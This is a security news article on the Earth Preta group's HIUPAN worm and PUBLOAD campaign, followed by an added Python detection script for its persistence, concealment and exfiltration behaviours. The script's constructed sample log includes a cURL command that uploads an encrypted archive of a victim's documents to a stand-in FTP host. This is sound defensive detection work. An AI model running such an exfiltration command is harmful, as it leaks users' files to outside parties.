The threat group known as Earth Preta has escalated its attacks by distributing malware through removable drives using a variant of the HIUPAN worm. This campaign targets specific countries and sectors in the Asia-Pacific region, combining several tools and techniques to deploy malware and exfiltrate data quickly.
According to researchers at Trend Micro, the HIUPAN worm plays a crucial role in Earth Preta’s attack chain, enabling the group to spread PUBLOAD through removable drives into the networks of their targets. The configuration file of HIUPAN contains vital information for its propagation and watchdog function, simplifying the setup and execution process. Once activated, HIUPAN installs a copy of itself on the victim’s system, creates an autorun registry entry for persistence, and modifies registry values to conceal its presence.
PUBLOAD, the primary control tool utilized by Earth Preta, conducts tasks such as gathering system information, mapping the network, and aiding in the delivery of additional tools like FDMTP and PTSOCKET. FDMTP, a newly identified hacking tool, is responsible for downloading and executing malware, while PTSOCKET functions as an exfiltration tool to transfer collected data to a remote server.
Previously, Earth Preta relied on spear-phishing emails to distribute PUBLOAD, but the shift to using removable drives for HIUPAN malware distribution allows them to target a broader range of victims and bypass certain security measures effectively. The countries suspected to be targeted in this campaign include Myanmar, the Philippines, Vietnam, Singapore, Cambodia, and Taiwan, all situated in the APAC region. Moreover, the decoy documents employed in these attacks predominantly center around government-related topics, particularly foreign affairs.
The HIUPAN worm variant utilized by Earth Preta in these attacks is easily configurable, with an external config file containing information for its propagation and watchdog function. The watcher function of HIUPAN periodically scans for removable and hot-pluggable drives and propagates to them if detected, ensuring the continuous spread of the malware.
PUBLOAD uses WinRAR to collect the targeted files into an archive, encrypts it, and uploads it to an attacker-controlled FTP site with cURL. Alternatively, PTSOCKET handles exfiltration and file transfer to the attackers in multi-threaded mode. Earth Preta’s collection and exfiltration operations are designed to be fast and quiet, which is why security teams need to stay current on these evolving tactics.
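The behaviours described above (an autorun registry entry for persistence, registry changes that hide the malware's presence, and a WinRAR archive followed by a cURL upload to FTP) are the kind of thing a detection engineer would turn into rules. The following is an added example written for this article, not code from Trend Micro or from the malware: a small rule-based detector run over constructed, Sysmon-style process-creation (EventID 1) and registry-value-set (EventID 13) events. The field names follow Sysmon naming, the log lines are made up, and the specific Explorer "hidden files" registry values it watches are an assumption, since the article does not say which registry values HIUPAN modifies.

```python
"""
Added example (not Trend Micro's or the malware's code): rule-based detection over
constructed Sysmon-style events for the behaviours the article attributes to
HIUPAN and PUBLOAD:
  1. a Run-key autorun entry that points at an executable (persistence),
  2. a change to Explorer hidden-file display settings (concealment; the exact
     values are an assumption, the article does not name them),
  3. a WinRAR 'add' job followed within a short window by a cURL upload to an
     ftp:// URL (collection and exfiltration).
"""
import re
from datetime import datetime, timedelta

# Constructed sample events: "<timestamp> key=value key=value ...", one per line.
# Raw string so the Windows backslashes stay literal.
SAMPLE_EVENTS = r"""
2024-09-05T10:01:02 EventID=13 Image=C:\Users\victim\AppData\Roaming\update.exe TargetObject=HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Update Details=C:\Users\victim\AppData\Roaming\update.exe
2024-09-05T10:01:03 EventID=13 Image=C:\Users\victim\AppData\Roaming\update.exe TargetObject=HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden Details=DWORD (0x00000002)
2024-09-05T10:05:00 EventID=1 Image=C:\Program Files\WinRAR\WinRAR.exe CommandLine="WinRAR.exe" a -r -hpPASSWORD C:\Users\victim\AppData\Local\Temp\docs.rar C:\Users\victim\Documents\*.docx
2024-09-05T10:05:30 EventID=1 Image=C:\Windows\System32\curl.exe CommandLine=curl.exe -T C:\Users\victim\AppData\Local\Temp\docs.rar ftp://203.0.113.10/upload/
2024-09-05T10:20:00 EventID=1 Image=C:\Windows\System32\notepad.exe CommandLine=notepad.exe C:\Users\victim\notes.txt
"""

# Registry paths of interest. In regex, "\\" matches a single backslash.
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
# Assumed concealment targets: Explorer's hidden-file / super-hidden / extension settings.
HIDDEN_SETTINGS = re.compile(r"\\Explorer\\Advanced\\(Hidden|ShowSuperHidden|HideFileExt)$", re.I)
FTP_URL = re.compile(r"ftp://", re.I)
RAR_ADD = re.compile(r"(^|\s)a\s")          # WinRAR 'a' = add files to archive
RAR_PASSWORD = re.compile(r"\s-h?p\S")      # -p / -hp = password-protected archive


def parse_event(line):
    """Parse one 'timestamp key=value ...' line. Values may contain spaces, so
    split only on a space that is followed by another key= token."""
    ts, _, rest = line.strip().partition(" ")
    fields = {"ts": datetime.fromisoformat(ts)}
    for token in re.split(r" (?=\w+=)", rest):
        key, _, value = token.partition("=")
        fields[key] = value
    return fields


def detect(lines, window=timedelta(minutes=10)):
    """Apply the three rules and return a list of finding dicts in event order."""
    findings = []
    rar_jobs = []  # recent archive-creation events, for the collect-then-upload rule
    for line in lines:
        if not line.strip():
            continue
        ev = parse_event(line)
        eid = ev.get("EventID")
        image = ev.get("Image", "")
        if eid == "13":
            target = ev.get("TargetObject", "")
            if RUN_KEY.search(target) and ev.get("Details", "").lower().endswith(".exe"):
                findings.append({"rule": "autorun_persistence", "image": image, "detail": target})
            elif HIDDEN_SETTINGS.search(target):
                findings.append({"rule": "hidden_file_settings_changed", "image": image, "detail": target})
        elif eid == "1":
            cmd = ev.get("CommandLine", "")
            low = image.lower()
            if (low.endswith("winrar.exe") or low.endswith("rar.exe")) and RAR_ADD.search(cmd):
                rar_jobs.append(ev)
            elif low.endswith("curl.exe") and FTP_URL.search(cmd):
                recent = [r for r in rar_jobs if timedelta(0) <= ev["ts"] - r["ts"] <= window]
                if recent:
                    archive_cmd = recent[-1]["CommandLine"]
                    encrypted = bool(RAR_PASSWORD.search(archive_cmd))
                    findings.append({"rule": "archive_then_ftp_upload", "image": image,
                                     "detail": cmd, "encrypted_archive": encrypted})
                else:
                    findings.append({"rule": "curl_ftp_upload", "image": image, "detail": cmd})
    return findings


def run_sample():
    """Run the rules over the constructed sample events."""
    return detect(SAMPLE_EVENTS.strip().splitlines())


if __name__ == "__main__":
    for f in run_sample():
        print(f["rule"], "|", f["image"], "|", f["detail"][:60])
```

The archive-then-upload rule deliberately keys on the sequence and timing rather than on the tool names alone, since both WinRAR and cURL are legitimate on many hosts; the password flag is recorded as extra context because the article notes the archives are encrypted before upload.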
Earth Preta has exhibited significant advancements in malware deployment and attack strategies, especially in campaigns targeting government entities in the APAC region. The utilization of tools like FDMTP and PTSOCKET greatly enhances Earth Preta’s control and exfiltration capabilities, with previous campaigns showcasing the use of multi-stage downloaders and exploitation of cloud services for data exfiltration.
The rapid turnover of decoy documents and malware samples on Earth Preta’s WebDAV server indicates highly targeted and time-sensitive operations, with a focus on specific countries and industries within the APAC region. Researchers anticipate that the group will continue to be active in these regions, posing a persistent threat to cybersecurity.
